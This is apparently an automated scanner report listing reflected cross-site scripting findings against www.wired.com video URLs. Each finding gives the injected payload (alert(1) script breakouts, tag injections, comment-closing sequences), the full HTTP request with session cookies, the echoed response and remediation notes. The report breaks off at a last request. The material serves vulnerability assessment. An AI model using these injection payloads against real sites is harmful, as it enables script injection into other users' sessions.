HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29477 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:43 GMT Date: Mon, 22 Nov 2010 00:42:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoac914--><script>alert(1)</script>70f13a29eaf/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 113f6"-alert(1)-"9d712c2a0d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos113f6"-alert(1)-"9d712c2a0d2/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:48:59 GMT Date: Mon, 22 Nov 2010 00:43:59 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106791
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96e1e"><a>d886052180 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos96e1e"><a>d886052180/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=274 Expires: Mon, 22 Nov 2010 00:47:22 GMT Date: Mon, 22 Nov 2010 00:42:48 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106772
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos96e1e"><a>d886052180 c_latest"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e61f6"-alert(1)-"a4270526c2e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/lateste61f6"-alert(1)-"a4270526c2e/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:17 GMT Date: Mon, 22 Nov 2010 00:45:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106798
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed243"><a>ec92b35d5e4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latested243"><a>ec92b35d5e4/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:14 GMT Date: Mon, 22 Nov 2010 00:44:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106784
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latested243"><a>ec92b35d5e4"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92ffd"-alert(1)-"273e389145b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/181581663392ffd"-alert(1)-"273e389145b/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=299 Expires: Mon, 22 Nov 2010 00:50:40 GMT Date: Mon, 22 Nov 2010 00:45:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106770
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21228"-alert(1)-"b482d416147 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus21228"-alert(1)-"b482d416147/652164127001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:56 GMT Date: Mon, 22 Nov 2010 00:45:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106770
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cc62"-alert(1)-"fa04636625 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/6521641270016cc62"-alert(1)-"fa04636625 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=288 Expires: Mon, 22 Nov 2010 00:51:04 GMT Date: Mon, 22 Nov 2010 00:46:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106759
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... ript type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 708ad"><a>a30d5c2b6ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video708ad"><a>a30d5c2b6ec/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29424 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:40:39 GMT Date: Mon, 22 Nov 2010 00:35:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video708ad"><a>a30d5c2b6ec ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 68867--><script>alert(1)</script>8206853922a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video68867--><script>alert(1)</script>8206853922a/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29463 Vary: Accept-Encoding Cache-Control: max-age=277 Expires: Mon, 22 Nov 2010 00:40:56 GMT Date: Mon, 22 Nov 2010 00:36:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video68867--><script>alert(1)</script>8206853922a/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d521e"><a>966c2b1aee3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videosd521e"><a>966c2b1aee3/latest/1815816633/make-drones-almost-invincible/660704541001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=287 Expires: Mon, 22 Nov 2010 00:41:20 GMT Date: Mon, 22 Nov 2010 00:36:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106770
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videosd521e"><a>966c2b1aee3 c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54ad4"-alert(1)-"dde8174050c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos54ad4"-alert(1)-"dde8174050c/latest/1815816633/make-drones-almost-invincible/660704541001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:50 GMT Date: Mon, 22 Nov 2010 00:37:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106777
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6cb4"-alert(1)-"2f4df01e458 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latestb6cb4"-alert(1)-"2f4df01e458/1815816633/make-drones-almost-invincible/660704541001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=294 Expires: Mon, 22 Nov 2010 00:43:47 GMT Date: Mon, 22 Nov 2010 00:38:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106804
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41fd3"><a>5c96c58a517 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest41fd3"><a>5c96c58a517/1815816633/make-drones-almost-invincible/660704541001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=279 Expires: Mon, 22 Nov 2010 00:42:44 GMT Date: Mon, 22 Nov 2010 00:38:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106699
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest41fd3"><a>5c96c58a517"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5784"-alert(1)-"7836b725487 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633d5784"-alert(1)-"7836b725487/make-drones-almost-invincible/660704541001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=283 Expires: Mon, 22 Nov 2010 00:44:04 GMT Date: Mon, 22 Nov 2010 00:39:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106756
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55dbc"-alert(1)-"be83cf07536 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/make-drones-almost-invincible55dbc"-alert(1)-"be83cf07536/660704541001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:38 GMT Date: Mon, 22 Nov 2010 00:39:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106685
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1228f"-alert(1)-"0a46e08cda4 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/make-drones-almost-invincible/6607045410011228f"-alert(1)-"0a46e08cda4 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=283 Expires: Mon, 22 Nov 2010 00:44:32 GMT Date: Mon, 22 Nov 2010 00:39:49 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4baf3"><a>7998fcdbb93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video4baf3"><a>7998fcdbb93/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
